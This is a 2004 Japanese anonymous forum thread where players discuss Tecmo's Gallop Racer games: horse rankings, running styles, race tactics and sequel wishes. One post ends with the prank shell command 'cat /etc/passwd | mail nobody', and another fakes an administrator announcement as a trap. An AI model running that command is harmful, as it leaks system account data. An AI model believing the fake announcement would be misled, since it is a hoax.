【ドミノ】ギャロップレーサー Part32【出ない】
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(___|_( /<,ヽ/
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| / ) )
ヒl ( \
\ 工)
【ラッキーレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすればカードで馬を強奪されないわ良い馬に乗れるわ
ランク上がりまくるわランク上位者が全員回線落ちするわでえらい事です
ヽ( ・∀・)ノ ウンコー
気が早すぎるかもしれないが8は来年以降になるんかな?
2年後くらいで良し。
エディット搭載、システム整備、デバック強化、ユーザーテストプレイ
や る こ と は や ろ う ぜ テ ク モ さ ん よ
エディットなんて搭載したらすぐに飽きそうだな。
搭載したとしてもすべて遊びつくした後に隠しモード的搭載でお願いしますって感じ
>>8 7が今年の2月に出た事を考えると、8が出るのは早くても来年の夏ごろだと思う。
>>10 それじゃなかったら初めのうちはOP入着程度の能力の馬しか
作れないようにして、勝利数とかG1勝利とかで
能力の最大値を大きく出来るようにして、
稼いだジョッキーポイントやお金を使って
手に入れられるようにすればいいんじゃないかって思う。
(当然能力の高い馬のがポイントやお金がかかるようにする。)
12 :
名無しさん@お馬で人生アウト:04/07/11 21:18 ID:tKG1kltz
>>11 自分で数値決め、アビリティをつけた馬に乗って楽しい?
個人的にはエディットで馬を作ると言うより既存の馬の能力を修正するのにエディット機能が欲しい。
だってテクモにまかせるとありえない能力とか一杯あるし・・・。
>>12 結構面白いと思うけどな。
2000のときも改造コードで超個性的な馬を作りまくったし。
このゲームのオリホシステムって代を重ねるごとに
どんどん能力が上がっていくようにしかなってないし、
ウイポやダビスタと違って能力が見えるから
最終的には皆FH最高サブパラ最高の個性の無い馬になってしまうんだよね。
6からアビがついたけど、それでも個性がつくってほどではないし。
そんなんだったらエディットで根性無しとか反応の鈍いマゾ馬とか
頭のイカレた馬とか個性的なのを作った方が楽しいと思う。
多分
>>12さんは何の苦労も無くそんなの作って楽しいかって思うんだろう。
だからこそシーズンモードでポイントやお金を稼いでから
手に入れられるようにしたらどうだろう?って考えたわけだ。
エディット機能つけるならいきなり最初からできるようにするんじゃなくて、
一度クリアした(エンディングみた)後とか、全要素コンプ後とか(レアアビはきついけどさ)
そんな感じがいい。
G1JみたいにGR7 2004とかで入れるようなせこいマネはやめて欲しいね。
エディット機能をつけるなら、アビリティとかはカタログで買えるようにすればいい。
根性や気性なんかのパラメーターはジョッキーポイントを使うとか。
例えば根性を1上げたいならジョッキーポイントは10ポイント必要とか。
アビリティも元から1億円で買えるようにして、シーズンモードで10レース大逃げを発動させて
レースに勝利すれば、レアアビリティがカタログ内に現れて、10億円で買えるようにするとか。
いや、エディットが欲しいと言ったのは面倒ジャンか、
お気に入りのパラメータの馬を作るのが、、、
イヤなら使わんでいいんだし。
エディット馬はシーズン、フリーで使用可、オンラインで使用不可、
今まで通りのオリホは全てOKって感じで。
なんていうか偶然でできる強い馬を作る喜びとは別に自分でとんでもない癖馬を作りたい、乗ってみたいってのがあるんだよね
かかり癖、融通性なし、馬ごみ苦手で気性折り合い反応最低クラスだけどうまく乗ると
高速の末脚、ど根性、一瞬の切れ、馬群突破、イン強襲とか複数持っててまとめて全馬なで斬りにするような馬とか
エディットをつけるにしろつけないにしろ、最終的にはどの馬も
名前と毛色が違うだけの個性の無い最強馬になってしまうような
オリホシステムを変えるべきだと思う。
最強馬作りに励むのなんてごく一部のヘビープレイヤーだけだし。
エディットをつけるにしろつけないにしろ、最終的にはどの馬も
名前と毛色が違うだけの個性の無い最強馬になってしまうような
オリホシステムを変えるべきだと思う。
最強馬作りに励むのなんてごく一部のヘビープレイヤーだけだし。
22 :
名無しさん@お馬で人生アウト:04/07/13 01:41 ID:HrsHq5Bk
そもそも個性ってなんだ?癖のある馬ってのは欠陥がある馬だろ?どの時代でも多数に支持されるのは個性のない、つまり癖のない優等生だろ。君の言っている癖馬、つまり個性のある馬の方こそごく一部のプレイヤーに当てはまると思うが…
>>22 例外として気性の悪い馬が勝負強いこともあるから一概には言えないけど、
基本的には優等生の馬が支持されやすいとは思うが。
でも、アビリティには個数と脚質に制限があるからそれで個性を出そうとしているけど、
なかなかうまくいかないものだね。
各アビリティにポイントを設けて、一頭の馬に付けられる合計ポイントを制限すればいい。
ポイントがプラスになるアビリティ(ど根性など)と、マイナスになるアビリティ(かかり癖など)の2種類を用意して
バランスを取らざるを得なくすれば、その組み合わせで自ずと個性とやらが表現されるのでは。
もちろん、組み合わせパターンが限定されないようにアビリティは死ぬほど用意すべき。
でもそーゆーのエディット機能とは言わんよな。
26 :
名無しさん@お馬で人生アウト:04/07/13 07:30 ID:+sTf8tNS
だからそういうことはここで言わずにテクモに(ry
別に
>>22を非難するわけでもないが時の世論はシンボリルドルフよりミスターシービーを、
テイエムオペラオーよりその他の馬を支持していた(支持=オッズではなく応援とかそんな意味で)
2chのスレを見れば必ずしも優等生が支持されてるとは思わない
完全無欠の最強馬に喜びを見出す人もいればゲームならでは再現できる癖馬をうまく使えることに爽快感を見出す人もいる
まあ好みは人それぞれだしどうでもいいことかもしれないが
最強馬を作る頃にはプレイヤーもかなりうまくなってる。
強い馬を作ってそれに乗って勝ちまくるのは当然だから、
いかに弱い馬や癖のある馬をうまく乗りこなして勝たせるかってのも
ジョッキーシミュレーションとしては面白いと思う。
>>27の言うとおりに好みは人それぞれだから、
現実ではいないような無敵の馬を作って
毎回大差勝ちしまくるのもそれはそれで面白いと思う。
今作は直線に入る時の位置取りで勝敗決まりすぎ
東京ですら追い込みとかは4角先頭くらいの勢いでまくらないと勝てない
デモプレイとか見てるとスペのJCでアンブラスモアがまんまと逃げ切ったりとかなんじゃらぽん
ごめんなさい本当はダンブレで直線一気が決まらないのが気に食わないだけです
2200mを境に一気に追い込みが決まらなくなるね
中距離までならレボ+一気系のアビで何とか決まると思うけど、
長距離は厳しいね…
でも、オンやっていると位置取りボーナスがあるんじゃないかと思ってくる。
長距離ならポツンと離れた最後方から早めに動いて、
ある程度スピード乗った状態で一気系アビ発動で差し切れないか?
>>32 馬群が縦長になっていたら_
早めに動いたつもりが前も同じくらいに仕掛け始めてるから
結局差は詰まらない
短 追込最強
長 逃げ最強
中 微妙(;´Д`)
初心者にオススメ
スプリンターズSは鼻きって粘り込むか殿から直線だけで差しきる
中山1200の先行策は下り坂のせいでスピード調節が難しい
36 :
名無しさん@お馬で人生アウト:04/07/14 19:23 ID:8Eymcm2E
37 :
名無しさん@お馬で人生アウト:04/07/15 10:43 ID:8VpaLPpo
保守あげ
短は差し最強じゃないか?
39 :
名無しさん@お馬で人生アウト:04/07/15 13:36 ID:JOfFnlUy
短距離は先行馬が乗りやすい
特に、早い逃げ馬がいる場合は楽。
とりあえずいいスタートを切って2、3番手追走、「4角先頭」を持ってるなら
早めに仕掛けて、直線向いて適当なところでムチを入れればほぼ確実にレボ発動
東京競馬場で四画先頭で押し切るには抜けてないと駄目だよね。
何時もは四画先頭で押し切る馬でも競馬場によって乗り方変えないと駄目なあたり上手く出来てると思う。
41 :
名無しさん@お馬で人生アウト:04/07/16 02:34 ID:vebu4kbK
>>40 その辺、同じレベルの馬なら確かに良く出来ている。
全然レボ出ませんが何か?
簡単にするとほぼ100%出るから萎えるしな
すいません、ちょっと発見したので聞いてください。
レース中の画面で権造や岡部の顔を見るとヒゲが生えてるんですね。
ガイシュツだったらすいません・・・。
>>43 マジで?やってみよ。
騎手ごとによって微妙に騎乗中の姿勢が違う気がする。
真横から見ると良く分かる。
もっと叩き合いが堪能出来たらなぁ〜。ど根性発動してもあんまり
叩き合いやってる!って手ごたえないよね。
あとトップロ、ドトウ、エイシンワシントンは接戦×が付いてるけど
あれは相手が馬鹿みたいに根性あっただけで別に接戦に弱いわけじゃないと思うんだけど・・。
特にワシントンはスプリンターズSだけで決められてる気がする。
しかも1センチ差でな。これは根性どうこうの差じゃない。
ところでこのゲーム
短距離は差し有利とよく聞くが
ほんとうか ?
と問いたい罠。
>>47 ギャロップ2の時は逆にやりすぎってくらいに差し返ししまくってたな
あれはあれで面白かった気はする
トップロードは接戦×しょうがない気もするがドトウはオペにG1で勝ったり常にワンツーだったし
接戦×はちょっとかわいそうな気がする
ワシントンはG1勝ってない分根性が不足とみなされてるんじゃね?
>>47 このゲームに出てくる馬は名前はそのまま、能力は似せてつくろうとしているが
実際馬そのままってわけでもない。
↑能力論はキリないからこれはどの能力論に対しても持つ俺の答えだがな
もちろん、競馬というものを題材につかってるだけに逃げ先行のエイシンワシントンが
ゲーム能力で差し追い込みに設定される無茶もないけどね。
ゲーム内のエイシンワシントンは単に接戦×とかそういう能力がついてるだけ。
ゲーム内のエイシンワシントン=現実のエイシンワシントンではない。
52 :
50:04/07/17 22:21 ID:yAvQSx3v
訂正 3行目 G1>古馬G1
トップロは接戦Xで良いと思う。
>もちろん、競馬というものを題材につかってるだけに逃げ先行のエイシンワシントンが
>ゲーム能力で差し追い込みに設定される無茶もないけどね。
地方はこんな感じの馬ばかりだよw
あ、海外もかな。
オペラオーは先行より差しだと思うけど・・・。
>>55 オペは判断が難しいところだと思う。
実際先行◎差し○だし…
あくまで自分の主観だがこのゲームは多頭数で道中8番手〜10番手以内でレースを進める馬
は先行4になっているように思える。
あと個人的におかしいと思うのはエアジハードなんだが…
脚質はやっぱりその馬が多く使った戦法が一番メインになるのはしょうがない気もするな
オペはあれでベターだと思う
ただ例えばシーキングザパールなんかベストパフォーマンスのモーリスドゲストは実際逃げて勝ってるけど
このゲームだと差しのみだからどうやっても再現できないとかでてくるのがファンとしてはやっぱり辛いところ
まあ無理なのは分かっているんだが・・
58 :
名無しさん@お馬で人生アウト:04/07/18 16:05 ID:5D4tuGxM
スティルインラブ
斤量×
夏場に弱い
>>58 ダイタクバートラムも 斤量× かも
あとはメイショウバトラー 単騎逃げ か?
スティルインラブは単に早熟なだけかも
>>57 タップダンスシチー、ネームヴァリュー
逃げるのはたまになのに、脚質は逃げ。
テクモのスタッフは印象で決める傾向がある。
だから逃げて見事な勝利をしたタップダンスシチーや
ネームヴァリューが逃げなんだろう。
まさか競馬を知らないスタッフが作ってるのか?
おかしな採用広告出したしな。
本当に取る気があるのかどうかわからんけど。
プロジェクトX実況スレに、GIJの地方競馬担当と称する人がいた。
地方大好きで、キャリアは少なくとも十数年以上。
取材もかなりしたっぽい。
こういう人は、スタッフに一人もいないのだろう。
セクレタリアトの逃げ適正見た瞬間テクモ社員殺したくなった
伝説クラスの馬=他馬スピード違いすぎて自然とぶっちぎり=逃げ
だもんな
70 :
名無しさん@お馬で人生アウト:04/07/19 08:10 ID:A6VGuJ4M
スティルインラブは牝馬戦○だろ。メイショウバトラーは単騎逃げと言うよりも二の脚って感じがするが?もちろん平坦巧者、小回り○、瞬発力70以上だろうな。
71 :
名無しさん@お馬で人生アウト:04/07/19 10:25 ID:kHsT7bMP
実際にセクレタリアト見たことないのに馬鹿なこと言うな
cat /etc/passwd | mail nobody
72 :
名無しさん@お馬で人生アウト:04/07/19 13:09 ID:vqwkaNmr
差し馬だけ折り合いが低くなるのは何故?ほとんど加速減速してないのに、、、
74 :
名無しさん@お馬で人生アウト:04/07/20 02:56 ID:kDDM8gUq
すいません・・・
ホリオってなんですか??
6に超ハマってます。7は買う価値ありますか?タップダンスシチーのランクはAかSになってますか?
6にハマってます。7は買う価値ありますか?
>>77 その前に、君に人間としての価値が無いとみた。
誤爆った。すまん
ここ開くとノートン先生がウイルスを感知して反応するんだが
何が原因?
ノートンが原因
>>83 ノートンの誤作動ってことか。
専ブラであぼーんすれば大丈夫かな。
>>85ありがとうございます。タップのファンだから嬉しい…
87 :
名無しさん@お馬で人生アウト:04/07/20 23:42 ID:wvuWpkPk
タップは凱旋門出ればSS確定だな。カフェ並みに
88 :
名無しさん@お馬で人生アウト:04/07/21 20:33 ID:7SYKKAaV
7は逃げ強杉だからタップで楽々凱旋門賞勝てるな。
でもタップの脚質は逃げじゃないと思うんだけどなぁ・・(逃げ○先行◎で四角先頭とか)
>>88 禿同。
もっとも、印象が強いという点ではしょうがないかもしれんけど。
タップはGI2勝だっけ?あと1勝すればSSは確定だと思うけど・・・。
今のところはSだろうな
>>92 JC、宝塚の勝ち方からいってSSになってもおかしくない。
ギャロップレーサー5を今頃
はまってます
タキオンはGT1勝なのにSSはおかしい。
96 :
名無しさん@お馬で人生アウト:04/07/22 18:47 ID:rncUEqgc
age
6の逃げの仕掛けどころがサッパリわからん。SS S SS D
っていうのが多い
>>95 タキオンは瞬発力がすごかったし、
将来とても期待されていたのでその分のボーナスでSS。
ランク付けは能力と実績だけではなく、
人気や(志半ばで引退、死亡した場合)将来性も入っている。
>>98 追記
ランク付けには勝ち方もある。
大逃げで逃げ切る、ものすごい追い込みを決める馬のがランクが高い。
要するに、ミーハー人気度が高いとupと…
>>101 あと、ステイヤーは軽視されると。
スーパークリークのSランクが一番わからないんだが、
基準がわからないのは今更だし、地方・海外の能力付けもいい加減だからな〜
マティリアルはAで十分
>>102 クリークは秋天も勝ってるのにね(´・ω・`)
クリークはもっと評価されてしかるべき馬だよなあ。
種牡馬の振るわなさまで評価に入れられてるんじゃないのか?
ライスシャワーもSだっけ?
>>106 Sだね
能力的にはデフォ馬だと最強クラスなのに
108 :
名無しさん@お馬で人生アウト:04/07/23 12:28 ID:brFj7Vzr
ダンシングブレーブで直線一気に
かわしていくのは爽快だったりする。
ヤマニンゼファーなんかも能力的にはSSなんだけどねえ
Q.逃げ馬で勝てません\(◎o◎)/!ど〜したらいいのでしょうか??
111 :
名無しさん@お馬で人生アウト:04/07/23 14:38 ID:brFj7Vzr
ふふっ、同じ逃げ馬の前に出て
邪魔する・・・
降着制度があるのでちと怖いが・・・
>>110 7は逃げやすいと思うよ。道中で息抜きさせて、ムチを連打せずに最後まで持たせれば強い馬ならまず負けないんじゃないかな。6は逃げにくかったなあ、、、
>>97残り600mで徐々に加速
その時に馬場の良い外に移動させて
残り450mからスパートかけるといいよ。
114 :
名無しさん@お馬で人生アウト:04/07/23 19:12 ID:JmjDgesC
>>110 とりあえずスタートで一気にハナに立つ
すぐさま内ラチ沿いに移動
他の逃げ馬が1頭ならケツブロックしつつスピード減
逃げ馬多数なら無理してまで追走しない
コレで大体勝てると思うがパワーがない馬の荒れ馬場走行には注意
仕掛けは自分で慣れてもらうしかないね
115 :
名無しさん@お馬で人生アウト:04/07/24 00:00 ID:vEcfo7e2
タキオンは将来性と言うより単に負け無しで2頭のスーパーホースに勝ってるからだろ??それだけで十分SSよ
タキオンはSSにしないと基地がうるさい。
ただそれだけ
○○の脚質がどうこう言うより、脚質自体いらなくね?
例えば、ススズとかなら逃げ以外ありえないけど、ああいうのが例外的で殆どの馬はハッキリとコレといった脚質なんてないんじゃない?
特にゲーム内で先行、差しに設定されている馬に関してそれを強く感じる。
まぁ、他の馬ゲーもみんなそうだけどねぇ、あれだけ能力やらアビやらあるんだから別にコレといった脚質なんて設定しなくても、必然的にベストな騎乗(位置取りも含めて)って決まってくると思うんだけどね。
勿論、レースによって変わってくるだろうけど。
>>117 それをすると競馬に詳しい人しかプレイできなくなる。
競馬に詳しい人ならペースや馬の特徴を見て
今回はどう乗ればいいかを考え付くと思うけど、
知らない人は脚質という目安が無ければどう乗ればいいかなど
全くわからないと思う。
だからどの競馬ゲームも脚質が設定されてるんだろう。
でももうちょっと脚質に融通性を持たせて欲しいとは思う。
119 :
名無しさん@お馬で人生アウト:04/07/24 15:47 ID:TXdZg7Wh
そうだね、
あとゲーム内でコンピューターが扱う馬が
もっと個性出してくれても面白いかなあ。
大逃げしてみたり、
途中でかかって行っちゃうとかさ。
横につられて自分の馬も行きそうになるのをなだめたりできたら
道中も飽きなさそう。
確かにレース展開に幅はほしいけど逆になくしたら折り合いだのベストスピードだの気にする必要なくなって
能力高い奴がよりいっそう勝ちやすくなる気がする
121 :
名無しさん@お馬で人生アウト:04/07/24 22:41 ID:v67tL8pq
age
122 :
名無しさん@お馬で人生アウト:04/07/25 09:27 ID:dkkDdv9R
なんで周りの馬はプレイヤーが動く方へ動くんだ?
>>122 COMは単に内に入りたいだけだよ
道中外側の馬が暴走するのは加速してでも内に入りたいから
>>124 よーく見ててみ
クビとかあがってなく、普通に加速して飛び出していくよ
大井は最内が空いて追い込めるのが…w
地方が大井以外直線長すぎて萎える
間違った
短すぎてだった
萎えるつっても実際そうだからしょうがない
>>119 7だと大逃げするし、コンピュータ馬もかかるよ。
131 :
名無しさん@お馬で人生アウト:04/07/27 01:48 ID:j03sJZ6m
>>130 ただ、スタートがよければ逃げ2でも大逃げすることもあるから、
自分が逃げ1乗っているときにはちょっと厳しいことも
直線短くても外廻して問題ないから7はだめぽ
6みたく地方でもロスを最小にしつつ差し馬で有利な逃げ馬を捕らえるのが最高に面白い
7は外回しても普通にロスないし前の位置の馬が上がり使うわで、どうにも燃えない
自分が乗る場合って1とか2ってカンケーあんのか?
>>133 あるよ
あれがベストの位置だから参考にしないと位置取り悪くなる
逃げでも3とかは離しすぎるとレボらない
略本がないとわからないからダメだよね
昔のGRは8段階くらいで普通に表示されてたのにねぇ
>>132 外を回る不利が全く無いのはこのゲーム最大の欠陥。
6のJCは外を回って距離をロスしても荒れ馬場を避けるか、
荒れ馬場を走ってでも距離を稼ぐかを馬の能力によって考えたけど、
今回は無条件で荒れ馬場を避ける方を選ぶからな。
オンライン対戦もあることだから、それも考慮しての事じゃないの?
外枠になった時点で終了とか萎えるしなぁ
んで、外不利じゃないのにスタート後に前カットするやつとか普通に居るし
内枠マンセーになったら今以上に殺伐とするような希ガス
>>136 それはないと思う。外枠の不利が無いなら
小回り○×のアビリティをつける意味が全く無い。設定ミスだろう。
>>137 小回り○×って遠心力だけでしょ?
コーナーで膨れやすいと他馬と接触する確率が上がるじゃん
139 :
名無しさん@お馬で人生アウト:04/07/27 19:43 ID:mTjxmeYr
地方馬の場合、直一気する馬ほとんどいないんでない?
よっぽど瞬間の反応のアビの方が地方馬にあってるのでは?
>>136 それは7の前カットで過剰に失速する設定した奴が酷いんだよ
内枠の差し馬だからって何が悲しくて前の馬を恐れて競馬せにゃいかんのだ
そこらへんのレースバランスを直せばだいぶ良くなると思うんだけどね
141 :
名無しさん@お馬で人生アウト:04/07/27 22:46 ID:K17H2L4c
東京競馬場でだけあんま勝てないよ。仕掛けのタイミング教えて。
どう勝てないのか知らんけどバテて交わされて勝てないなら仕掛け遅らせて
追って届かずなら4角で少しまくり気味にいくとか。
追い込み馬が楽しいな
内を突くか、馬群に突っ込むか、大外回すか、あるいはまくるか
144 :
名無しさん@お馬で人生アウト:04/07/27 23:29 ID:sJTTF7tE
1 名前:ひろゆき@どうやら管理人★ 投稿日:04/07/27 19:40 ID:???
死亡予定機能を搭載しました。
名前欄にDEATHfusianasanといれて書き込むと、
【2054/12/4・16:21肺ガン】【2021/08/21・08:16自殺】などに変換されますです。。。
145 :
名無しさん@お馬で人生アウト:04/07/27 23:36 ID:wwJLx8vE
ドワイエンは間違いなくハイペース○だな。
>>143 直線の長さと持っているアビでいろいろ楽しめるけど、
イン強襲だけどうも効率悪い気がする。
残り100mまでにインである程度抜き去れば勝ち負けはほぼ確定するし、
何より他の一気系と同時発動しないのが厳しい。
147 :
【2005/7/26・23:11鬱病による自殺】:04/07/28 00:36 ID:WNKfbuLh
148 :
名無しさん@お馬で人生アウト:04/07/28 00:46 ID:WNKfbuLh
orz
>>139 あれば付ければいいし無ければ無い。それでいいじゃん。
後、このゲームの地方馬の能力設定は(ry
なので文句つけるのも無意味だ。
トラップかよorz
156 :
名無しさん@お馬で人生アウト:04/07/28 11:37 ID:BB3mCA/Q
エイシンチャンプがSなことに対して抗議の電話をした香具師ノノ
157 :
名無しさん@お馬で人生アウト:04/07/28 12:21 ID:WNKfbuLh
オペラオーでパーフェクトのタイトルを取る事は可能でしょうか?
159 :
名無しさん@お馬で人生アウト:04/07/28 13:39 ID:VqxKA5nA
みなさん過去スレ読む事はしないのですか?
簡単な質問ばっかりして。。
>>158 とった人はいるらしいが、フェブラリーSが難しいとか
>>159 同意。
>>1の 競馬ゲームスレ一覧 に過去ログあるから検索ぐらいして欲しいが。
162 :
名無しさん@お馬で人生アウト:04/07/28 22:00 ID:FHz8UIhQ
てかお手馬で全勝したいからリセばっかしてる俺。
163 :
名無しさん@お馬で人生アウト:04/07/28 23:11 ID:z4TQ2c1Y
プレイヤーの実力で馬の能力差をひっくり返すことが比較的容易なのは1〜7のどれ?
それ買おうと思うんだが…。
>>163 >プレイヤーの実力で馬の能力差をひっくり返すことが比較的容易なのは1〜7のどれ?
ぶっちゃけ2だと思うw
最初に買える馬で凱旋門勝てるからな
バブルで菊も大差勝ちできるからなあw
マック強かったなぁ
1は追い込みマンセーだからね
1はマチカネタンホイザで凱旋門ぶっちぎりとか今考えるとものすごい無茶
コーナーで馬と馬の間抜けられないから
いつも大外ブン回しです、はい
1はスタミナのある馬で超ロングスパートかければそのまま押し切れる
1からやってるって、おまえらオサーンですか?(プ
1はラガービッグワンでもGI勝てるからな。
>>173 PS世代がオサーンとか言うあなたは夏厨ですか?
オフライン専門の人って道中ムチ打ったり、
600mギリギリでレボ発動させたりしているの?
オンライン対戦だとみんな使っていて何じゃこりゃって思うんだが
>>176 道中ムチはつい最近知ったけど、オフでも使ってるよ。
差しや追込でまくると位置取り評価悪くなって貰えるポイント減るのうざいし
逃げや先行はわざわざ使う必要ないから使ってない。
600レボはバテるから滅多に使わないなぁ…
次回はチアズブライトリーのランクアップと能力アップ希望
>>178 同様にシルクフェイマス、メイショウバトラーも希望だな
「欧州のレースはムチ七回まで」希望、はしない、やっぱ。
181 :
名無しさん@お馬で人生アウト:04/07/31 03:24 ID:fZA1Zy1k
>>177 道中ムチってまくりをするときとかに有効なの?
普通にまくってこうとすると先頭までまくりきれなかったり
勢いよすぎて追い抜いたりするときがあるんだけど・・・。
>>181 折り合いの低い馬でスピードを上げたいときとか、
まくりながらレボしたい時とかに主に使うけど。
183 :
名無しさん@お馬で人生アウト:04/07/31 11:51 ID:7/TLC/Rs
皐月賞でタヤスツヨシ使ってジェニュインに勝てる人いる?
ダイタクテイオーでは勝てませんねえ
>>183 フリーで枠順再現して普通でやってみたけど、
勝ち方にこだわらなければ勝てる。
>>181 まくりにも有効だし、その時点以降の折り合いと位置取り判定が無視されるから
折り合いの悪い馬で加速しても黄色にならないし
位置取りを外れたからといって評価も下がったりしない。
187 :
名無しさん@お馬で人生アウト:04/07/31 20:04 ID:JZFGJG7x
このゲームって過大評価や過小評価な馬が多いですね。
189 :
181:04/08/01 00:37 ID:+kUBa4ws
スタミナ消耗しやすくなるし、瞬間の反応?(良く覚えてないです)が発動しなくなったような気がします。
2002高松宮記念、トロットスター強すぎ
>>158 フェブラリーSさえクリアすれば後は余裕
レボ+ゴールドティアラの不利が重ならないと厳しいけど
193 :
名無しさん@お馬で人生アウト:04/08/01 19:27 ID:5KoyOYW6
カフェの能力落としてポケの方をを上げてほしいな
194 :
名無しさん@お馬で人生アウト:04/08/01 19:31 ID:yDvoAzef
スペシャルレース1989年マイルCSのホクトヘリオスがうざい
オグリ使って直線あっさり抜け出して
「勝ったな、フッ」って感じでいたら
ゴール直前大外から飛んできやがった_| ̄|○
ホクトヘリオス?
あんな晩成の糞馬が突っ込んでくるだと?
196 :
名無しさん@お馬で人生アウト:04/08/02 01:25 ID:V2Qcga0B
93年天皇賞春のパーマー最強
尻にくっついて行けば勝てるけど・・・
パーマーは元々強いんだよ
なんで弱いとか一発やとかのイメージ定着してるんかね
そりゃ成績が安定してないからだろ
でも成績が安定してるビワハヤヒデは不当な扱い
ビワハヤヒデってぶっちゃけイマイチ君だった気が・・・
>>200 3歳春まではレースごとにがっくりしてたよw
秋過ぎたら万歳繰り返したけど。
秋天の故障が未だに惜しまれる…。
202 :
名無しさん@お馬で人生アウト:04/08/02 23:41 ID:hZzOCvUf
ビワって、顔デカかったよな。
203 :
名無しさん@お馬で人生アウト:04/08/03 01:38 ID:GwwywFXZ
ビワハヤヒデって連はずしたの一回だけだろ?それがイマイチ扱いかよ。
まあ取りこぼしも結構あったしなあ
取りこぼしって格下相手に負けることだよ?
取りこぼしたと言えるのは共同通信杯と、あとはせいぜい朝日杯くらいしかないかと。
春二冠や有馬はまわりも強かったし、この馬も十分走ってる。
GT3勝、レコード4回、15連続連体で、本格化した旧5歳は故障するまでは完璧な成績。
相手が弱かったやらイチャモン付けたとしても、やはりどう考えても評価は低すぎる。あらゆるゲームで。
ごめん、取りこぼしって言ったのは悪かった。
要するにオレが言いたかったのは4歳時までは2着も多かったから
イマイチ君って印象があるんじゃないかってことです。
207 :
名無しさん@お馬で人生アウト:04/08/03 03:49 ID:GwwywFXZ
206って200だったのか
そっか、ごめん。そのまま引用しただけなんだけどな。もう寝るわ・・・
ウイングアローの狂ったピークとかニホンピロサートのメイン脚質逃げとかのほうが
よっぽど問題だと思うが
212 :
名無しさん@お馬で人生アウト:04/08/03 08:40 ID:5zhGosLo
ダービー(難しい)
ブライトでサニブーに勝つのは不可能
>>212 まくれ、超まくれ
ところでおまいら、レアアビいくつ出た?
俺は不屈の闘志、重の鬼、連投マスター、馬場状態不問、一発屋、アイドルホースの6つ
ドミノは遠いな…
>>212 直線で5馬身ぐらい前にでるように捲くれば勝てるはず
>>213 出たのは光速の末脚、一瞬の爆発力、距離不問、重の鬼、馬場状態不問、アイドルホースの6つ
重の鬼以外は保存してある。
同じく禿げしく遠い・・・
>>213 脅威の粘り、不屈の闘志、タフネス、距離不問しか出てないorz
どんな馬でも引退まで自分で乗ってるから効率が悪い・・・
>>176 今更だけど・・・
600鞭は使い方次第で凄い武器
距離が短いレースでは恐ろしいほど効果があるぞ〜
展開と騎乗馬のスタミナを考慮して使うといいよ
>>212 手段を選ばないんなら逃げるススズorサニブをマークして走れば?
残り1000位でじわじわ引き離し450で手綱150で鞭
カツラギエースの強さは何とかならんか
218 :
名無しさん@お馬で人生アウト:04/08/03 18:18 ID:o/kOnkxa
>>216 レボってから鞭で追わないようにすると結構距離もつんだよね。
スピード上がりすぎたら抑えるのもいいし
ウイングアローのピークが3歳ってどういうことですか。
シャトルもスペもエルコンもピークおかしくない?みんな4歳の頭にはもう下り坂に入ってるけど・・
特にスペは4歳秋に秋天、JCと勝ってるのに能力ダウンが著しい。
221 :
200:04/08/03 19:59 ID:+8J3S//q
なんかすげえ釣れててびっくり
何の気なしに言ったのになぁ
204には悪いことをした。すまん
レボる、レボるっておまえら達人ですか?
俺は1/50ぐらいですよ。
それは釣れるとは言わんよ坊や
>>222 かんたんモードで道中ごちゃつかなければ大抵でます。
ランキング対戦だと出さないと勝負にならない事が多いので・・・
難しいなら1割以下なのでご安心を
>>211 たしかにウィングアローのピークは酷い。
あんなパラじゃ2:07:00は無理だ。
>>225 ゲーム内に、あんな高速馬場は無いから。
差し、追い込みのレボって難しくない?
逃げ、先行なら簡単にレボるんだけど差し、追い込みだと合わせて5回くらいしかレボったことない・・・
ヘタレですか?
>>227 多分、スタート後の位置取りが悪いと思われ。
短距離だとその判定が早いからスタートの矢印を少しずらせばうまくいくのでは。
瞬発力高い差し・追い込みだと多少スタート悪くても前いくから、
そのへんは減速で調整すれば大丈夫
>>228 ありがとう。ちょっと意識してやってみます。
しかも差し、追い込みでレボったのって4角先頭持ってる馬でまくって4角先頭→レボってパターンしかないんだけど
うまくやれば直一気or殿一気出しながらレボになります?
気持ちいいんだろうな・・・
>>229 >>186より、道中ムチを使ってギリギリまで位置を前目に持ってきて、
600レボでスタミナ消費を抑えて直線に入れば結構突き抜けると思う。
ただし、小倉や函館みたいな極端に直線が短いところだと能力差が必要だけど。
>>230 道中ムチっていうのがよくわからないけどそれは練習してみます。
アドバイスありがとう。
ツルマルツヨシとセキテイリュウオーのピークが四歳一月ってどういうことだよ
ほかにも成長のピークがおかしな馬多々あるけどこの二頭の成長のピークがどうしても気にいらない
マイネルデスポットで菊花賞勝てねえ
つうか3着にもなれん
234 :
名無しさん@お馬で人生アウト:04/08/04 11:30 ID:RkrHs1RH
糞ゲー( ´,_ゝ`)プッ
>>233 大逃げタイプなのに瞬発力低いからスタート決めても遅れ気味になるから結構厳しい・・・
スタート飛ばしてある程度距離を保って、残り1000mで後続離して、400m仕掛け、スピード落ちてきたらムチで勝てるかな。
前目につくジャンポケと最後飛んでくるカフェに要注意
>>233 ラッキーレボを無理矢理出して3.02秒台出したがジャンポケに負けた・・・・
今度は距離を保って大逃げ、3.3秒台でも割と余裕勝ち・・・
勝つか負けるかはジャンポケ次第
ナギサがやけにランクEの割りに強い
98年エリ女レボって勝てた
240 :
名無しさん@お馬で人生アウト:04/08/04 22:12 ID:oHeLwTEi
>>233 道中は1F12秒のイーブンペースを意識してラスト600からジュワーッと仕掛ければいいかも
ジュワーッってどんな仕掛けやねん
242 :
名無しさん@お馬で人生アウト:04/08/05 20:23 ID:ZG6wyO3A
炭酸飲料が喉を通り過ぎる早さぐらいでって事だろ
このゲーム、チャクラの能力ひどすぎる・・・・・・il||li _| ̄|○ il||li
恐らくBランクで最弱。
チャクラって意外と勝てる気がするんだけどなあ。
こないだ13番人気で目黒記念勝てたよ。
サブパラが酷くないせいかな?
245 :
名無しさん@お馬で人生アウト:04/08/06 02:58 ID:8znND1h1
あなたの実力です
作業してるみたいでツマラン
たまーにやると面白いね。これ
たまーにやると驚くほど下手糞になってて鬱になる。
昨日メモリアルレースの神戸新聞杯出したんですよ。
そしたら園田のシンドバットがいて感動しましたw
しかも地方のFのくせにSP70以上あるし・・・。
で、単勝344倍の大穴出すために乗ってみました!(難しいで)
レボったのに最下位でした。 ⊂(。Д。⊂⌒`つ
リアルでいいじゃないか。
251 :
名無しさん@お馬で人生アウト:04/08/08 21:47 ID:ZMrqqJHq
保守
252 :
名無しさん@お馬で人生アウト:04/08/10 01:23 ID:kV8wjbd/
久々にニューゲームでやってみたけど、
スタートの動きが速すぎる。
